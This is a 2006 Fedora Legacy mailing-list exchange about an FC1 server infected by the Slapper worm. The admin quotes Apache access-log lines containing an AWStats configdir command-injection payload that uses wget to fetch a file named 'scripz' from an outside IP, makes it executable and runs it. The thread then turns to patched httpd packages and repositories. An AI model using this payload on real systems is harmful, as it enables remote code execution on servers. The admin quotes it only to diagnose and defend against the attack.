Hi James, > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Michael Mansour wrote: > > Hi guys, > > > > I have an FC1 machine which got infected twice with the slapper worm, and then > > started DOS attacking a large vendor. > > > > I've stopped slapper in its tracks with a couple of changes to FC1, but in > > analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache > > SSL server which I've now turned off), I see the following bit of interest in > > my apache access_log: > > > > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET > > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft > > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| > > HTTP/1.1" > > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" > > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET > > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft > > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| > > HTTP/1.1" > > 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" > > > > These "scripz" files end up going into /tmp, being compiled with gcc, renamed > > to "httpd" and run as that. > > > > I'm using: > > > > perl-5.8.3-17.4.legacy > > httpd-2.0.51-1.9.legacy > > openssl-0.9.7a-33.13.legacy > > > > Are there any updates FL can do to any of the packages to fix/block slapper > > from an FC1 machine? > > > > Michael. > > > > Michael, > > Try my version of httpd here: > http://support.intcomgrp.com/~jkosin > > It has been effective against the worm so far. Thanks, I will actually try them out today. Have you considered making a yum/apt repo for your packages? it'll make it much easier to yum to newer releases when you have them, and it's quite easy to make a yum/apt repo. Michael. -- fedora-legacy-list@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-legacy-list
